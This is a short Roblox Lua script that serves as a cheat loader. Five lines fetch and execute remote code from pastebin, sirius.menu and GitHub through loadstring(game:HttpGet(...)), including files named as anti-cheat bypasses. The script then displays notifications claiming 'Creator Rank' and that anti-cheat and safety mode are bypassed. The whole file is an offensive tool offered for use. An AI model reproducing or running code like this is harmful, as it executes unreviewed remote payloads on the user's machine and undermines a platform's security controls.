local OrionLib = loadstring(game:HttpGet(('https://pastebin.com/raw/eYDSujH3')))()
loadstring(game:HttpGet('https://sirius.menu/sirius'))()
loadstring(game:HttpGet('https://raw.githubusercontent.com/Tamim468/releases/main/bypass.lua'))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Who-Is-E/Anti-Cheat-Bypass/main/Bypass.lua"))()
loadstring(game:HttpGet("https://pastebin.com/raw/UqQySHcR",true))()


OrionLib:MakeNotification({
	Name = "Rank",
	Content = "You're Creator Rank",
	Image = "rbxassetid://4483345998",
	Time = 5
})

OrionLib:MakeNotification({
	Name = "Systems",
	Content = "Bypass Anti cheat and Safty Mode",
	Image = "rbxassetid://4483345998",
	Time = 5
})
